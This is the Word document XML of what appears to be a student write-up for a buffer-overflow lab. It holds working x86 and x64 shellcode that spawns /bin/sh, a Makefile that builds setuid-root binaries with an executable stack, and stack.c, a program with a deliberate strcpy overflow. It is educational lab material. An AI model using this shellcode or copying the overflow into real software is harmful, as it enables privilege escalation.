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525"/>
  <w:body>
    <w:p w14:paraId="0C3BDA62" w14:textId="6F464A3A" w:rsidR="00B00F79" w:rsidRDefault="00C17DD1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C17DD1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Task 1: Getting Familiar with Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769A7E97" w14:textId="1FF759DF" w:rsidR="00C17DD1" w:rsidRDefault="00C17DD1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F3F92F4" w14:textId="2806524E" w:rsidR="00C17DD1" w:rsidRDefault="00C17DD1" w:rsidP="00C17DD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 Version of Shellcode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CB1373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17DD1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="98C379"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB5D6C7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3FD6C61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17DD1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() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C33A825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C17DD1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17DD1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C17DD1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>name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C17DD1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proofErr w:type="gramStart"/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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="24C6644B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C17DD1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>name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C17DD1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C17DD1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17DD1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="98C379"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>"/bin/sh</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C17DD1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6A024458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C17DD1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>name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C17DD1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C17DD1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C17DD1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7404DF86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A0005AC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C17DD1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="61AFEF"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>execve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C17DD1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>name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C17DD1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], </w:t>
      </w:r>
      <w:r w:rsidRPr="00C17DD1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>name</w:t>
      </w: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C17DD1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proofErr w:type="gramStart"/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6DE68A32" w14:textId="77777777" w:rsidR="00C17DD1" w:rsidRPr="00C17DD1" w:rsidRDefault="00C17DD1" w:rsidP="00C17DD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17DD1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15903BAD" w14:textId="6CF2E779" w:rsidR="00C17DD1" w:rsidRDefault="00C17DD1" w:rsidP="00C17DD1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA70777" w14:textId="71E0B653" w:rsidR="003A589B" w:rsidRDefault="003A589B" w:rsidP="003A589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32-bit Shellcode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E45F09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Store the command on stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351EC5B2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xor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eax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eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789306F1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eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7E3E1E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"//sh"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7521D465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"/bin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDE1C2E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ebx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esp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ebx --&gt; "/bin//sh": execve()’s 1st argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEBE35B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07E014F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Construct the argument array argv[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D051914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eax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 </w:t>
      </w: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argv[1] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079FE4E4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ebx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 </w:t>
      </w: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argv[0] --&gt; "/bin//sh"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1CC364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ecx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esp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ecx --&gt; argv[]: execve()’s 2nd argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16808E86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CE87130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For environment variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4B155A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xor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edx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edx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edx = 0: execve()’s 3rd argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477F1282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0F5E5E2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Invoke execve()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2480F515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xor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eax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eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0246E25A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al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0x0b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9F153C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="7F848E"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>; execve()’s system call number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74664140" w14:textId="77777777" w:rsidR="009F153C" w:rsidRPr="009F153C" w:rsidRDefault="009F153C" w:rsidP="009F1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F153C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9F153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9F153C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>0x80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BF7FD1" w14:textId="1DB158DF" w:rsidR="003A589B" w:rsidRDefault="003A589B" w:rsidP="00EC5D21">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37AB23AD" w14:textId="3B847452" w:rsidR="00CB2451" w:rsidRDefault="00CB2451" w:rsidP="00EC5D21">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="636F4AC6" w14:textId="3F9477BB" w:rsidR="00CB2451" w:rsidRDefault="00CB2451" w:rsidP="00EC5D21">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DC206B1" w14:textId="57879242" w:rsidR="00CB2451" w:rsidRDefault="00CB2451" w:rsidP="00EC5D21">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0702E5A4" w14:textId="15307B21" w:rsidR="00CB2451" w:rsidRDefault="00CB2451" w:rsidP="00EC5D21">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FF05D74" w14:textId="433E1B62" w:rsidR="00CB2451" w:rsidRDefault="00CB2451" w:rsidP="00EC5D21">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40AD5C56" w14:textId="55BC31FF" w:rsidR="00CB2451" w:rsidRDefault="00CB2451" w:rsidP="00EC5D21">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FD6ECEA" w14:textId="77777777" w:rsidR="00CB2451" w:rsidRDefault="00CB2451" w:rsidP="00EC5D21">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="001FB91C" w14:textId="1E042221" w:rsidR="00DD1BAE" w:rsidRDefault="00DD1BAE" w:rsidP="00DD1BA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64-bit Shellcode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658B63AF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xor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rdx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rdx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rdx = 0: execve()’s 3rd argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7C1B93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rdx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473A9890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rax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'/bin//sh' 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the command we want to run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFBB510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rax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5DFE1B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rdi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rsp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rdi --&gt; "/bin//sh": execve()’s 1st argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEA1CBD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rdx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     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argv[1] = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5D4AB7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push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rdi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     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argv[0] --&gt; "/bin//sh"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12080FF9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rsi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rsp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rsi --&gt; argv[]: execve()’s 2nd argument</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A596D7E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xor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rax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rax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CA50CB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mov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al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CB2451">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>0x3b</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB245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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2451">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="7F848E"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>; execve()’s system call number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738A434D" w14:textId="77777777" w:rsidR="00CB2451" w:rsidRPr="00CB2451" w:rsidRDefault="00CB2451" w:rsidP="00CB24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451">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="C678DD"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9E00F7" w14:textId="0D0DD195" w:rsidR="00DD1BAE" w:rsidRDefault="00DD1BAE" w:rsidP="00DD1BAE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="662E0982" w14:textId="46A18326" w:rsidR="00744078" w:rsidRDefault="00744078" w:rsidP="007440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Actual task:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D31220B" w14:textId="0265B731" w:rsidR="00744078" w:rsidRDefault="00744078" w:rsidP="00744078">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>call_shellcode.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6541F086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&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB53E5D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&lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D264F07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&lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B27FD4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7DEE260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7F848E"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>// Binary code for setuid(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9F481A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7F848E"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>// 64-bit:  "\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659DF55E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7F848E"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>// 32-bit:  "\x31\xdb\x31\xc0\xb0\xd5\xcd\x80"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DB14E0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ABCCDA3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const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shellcode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[]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</w:p>
    <w:p w14:paraId="2829AE39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#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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61AFEF"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>__x86_64__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620D8989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744078">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e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</w:p>
    <w:p w14:paraId="3C623BE4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744078">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57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</w:p>
    <w:p w14:paraId="1FA05B9E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744078">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05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</w:p>
    <w:p w14:paraId="65E7824E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#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7D7ED63B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744078">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f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</w:p>
    <w:p w14:paraId="05ED84DB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744078">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31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</w:p>
    <w:p w14:paraId="040E7CEF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744078">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>\xd2\x31\xc0\xb0\x0b\xcd\x80</w:t>
      </w:r>
      <w:r w:rsidRPr="00744078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</w:p>
    <w:p w14:paraId="3ADB9938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#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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endif</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1591BC42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    ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EFEB53" w14:textId="56365A01" w:rsid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E27BAF7" w14:textId="553C976E" w:rsidR="0074404C" w:rsidRDefault="0074404C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08A40FD" w14:textId="22EBDE36" w:rsidR="0074404C" w:rsidRDefault="0074404C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DB88F37" w14:textId="77777777" w:rsidR="0074404C" w:rsidRPr="00744078" w:rsidRDefault="0074404C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9237D3C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lastRenderedPageBreak/>
        <w:t>int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 xml:space="preserve"> argc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,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**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argv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0188357A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code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744078">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>500</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="61783228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B290225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61AFEF"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>strcpy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code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shellcode</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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4F443409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func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)()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)())</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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code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068D1B02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E51D81E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E06C75"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>func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54DCE02C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44078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744078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3890D9C4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44078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27FF0F9E" w14:textId="77777777" w:rsidR="00744078" w:rsidRPr="00744078" w:rsidRDefault="00744078" w:rsidP="007440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3318023" w14:textId="6B0F58AF" w:rsidR="00744078" w:rsidRDefault="00744078" w:rsidP="00744078">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46CA318D" w14:textId="51FF9433" w:rsidR="00BF20FB" w:rsidRDefault="00BF20FB" w:rsidP="00BF20F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 the 32-bit &amp; 64-bit versions with the Makefile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7425304E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61AFEF"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="00334B13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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BB2017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gcc -m32 -z execstack -o a32.out call_shellcode.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CAE0A9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gcc -z execstack -o a64.out call_shellcode.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C195FC1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47B36F8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61AFEF"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>setuid</w:t>
      </w:r>
      <w:r w:rsidRPr="00334B13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</w:p>
    <w:p w14:paraId="45F8A95A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gcc -m32 -z execstack -o a32.out call_shellcode.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F85B2B1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gcc -z execstack -o a64.out call_shellcode.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772517B3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sudo chown root a32.out a64.out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650B2157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sudo chmod 4755 a32.out a64.out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770AF56C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A7622DF" w14:textId="77777777" w:rsidR="00BF20FB" w:rsidRPr="00334B13" w:rsidRDefault="00BF20FB" w:rsidP="00334B1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61AFEF"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>clean</w:t>
      </w:r>
      <w:r w:rsidRPr="00334B13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</w:p>
    <w:p w14:paraId="1A30266C" w14:textId="54F4CB9B" w:rsidR="00BF20FB" w:rsidRPr="00334B13" w:rsidRDefault="00BF20FB" w:rsidP="00B92FC5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34B13">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E5C07B"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>    rm -f a32.out a64.out *.o</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E5516D" w14:textId="70D6CBA0" w:rsidR="00BF20FB" w:rsidRDefault="00BF20FB" w:rsidP="00BF20FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B4EB966" w14:textId="493F7EB6" w:rsidR="002D0C8F" w:rsidRPr="002D0C8F" w:rsidRDefault="002D0C8F" w:rsidP="002D0C8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 the Makefile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7E26A4" w14:textId="6EBAE526" w:rsidR="00B92FC5" w:rsidRPr="00334B13" w:rsidRDefault="00B92FC5" w:rsidP="00B92FC5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make</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D188E9" w14:textId="6A851FE1" w:rsidR="00B92FC5" w:rsidRDefault="00B92FC5" w:rsidP="00BF20FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1024F327" w14:textId="6838E4E8" w:rsidR="003C6CBA" w:rsidRDefault="003C6CBA" w:rsidP="003C6CB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 the binaries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71642DE6" w14:textId="25F45DBE" w:rsidR="003C6CBA" w:rsidRPr="003C6CBA" w:rsidRDefault="003C6CBA" w:rsidP="003C6C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./a32.out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0AC446" w14:textId="55CE0B96" w:rsidR="003C6CBA" w:rsidRPr="003C6CBA" w:rsidRDefault="003C6CBA" w:rsidP="003C6C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./a64.out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291CBE59" w14:textId="77777777" w:rsidR="00D20DE1" w:rsidRDefault="00D20DE1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59979BBE" w14:textId="6FF5A888" w:rsidR="00D20DE1" w:rsidRDefault="00D20DE1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>We get 2 shell binaries, one 32-bit and the other 64-bit</w:t>
      </w:r>
      <w:r w:rsidR="00A409FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0004231F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="01378644" w14:textId="03C8600E" w:rsidR="003C6CBA" w:rsidRDefault="0004231F" w:rsidP="003C6CBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0004231F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 2: Understanding the Vulnerable Program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3919A538" w14:textId="27E42EA9" w:rsidR="0004231F" w:rsidRDefault="0004231F" w:rsidP="003C6CBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77DED0A6" w14:textId="2664336E" w:rsidR="0004231F" w:rsidRDefault="0004231F" w:rsidP="0004231F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>stack.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534AC182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&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EE8744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&lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC8433F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&lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F326F6D" w14:textId="77777777" w:rsidR="0072535F" w:rsidRDefault="0072535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7F848E"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FF2F3B0" w14:textId="33F16813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#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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ifndef</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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BUF_SIZE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467B75D6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#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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define</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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BUF_SIZE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100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096476DA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#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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endif</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6E303015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9B179E2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void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dummy_function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389DAE71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439E8A4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bof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0C9E88EA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buffer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BUF_SIZE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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="38F7285D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CD449D4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7F848E"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>// The following statement has a buffer overflow problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7721463E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strcpy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buffer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5290BF05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5FCFE75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25BA879A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7FF0E227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720EFBF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 xml:space="preserve"> argc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,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**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argv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259A5CB6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517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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2DE3824B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E5C07B"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>FILE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proofErr w:type="gramStart"/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0C0A385D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F20F557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fopen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"badfile"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"r"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2E70F53B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4231F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="56B6C2"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>!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3E7C9E31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perror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"Opening badfile"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4DCD9BC3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exit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63DD5923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3DB170A0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B3A8CF4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length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fread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sizeof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), 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517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703E5CE1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 xml:space="preserve">"Input size: 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04231F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length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237E27B0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dummy_function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39C55FD5" w14:textId="73B5E19A" w:rsid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fprintf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stdout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"==== Returned Properly ====</w:t>
      </w:r>
      <w:r w:rsidRPr="0004231F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04231F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239CBA85" w14:textId="77777777" w:rsidR="000D7EF3" w:rsidRPr="0004231F" w:rsidRDefault="000D7EF3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3FA4080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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="074EBC91" w14:textId="44A9C69A" w:rsidR="0072535F" w:rsidRPr="000D7EF3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69B045CE" w14:textId="5CE99039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lastRenderedPageBreak/>
        <w:t>void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dummy_function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2A72CEEC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dummy_buffer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1000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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1178FA78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memset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dummy_buffer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04231F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>1000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692D930D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4231F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="61AFEF"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:t>bof</w:t>
      </w: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04231F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proofErr w:type="gramStart"/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  <w:proofErr w:type="gramEnd"/>
    </w:p>
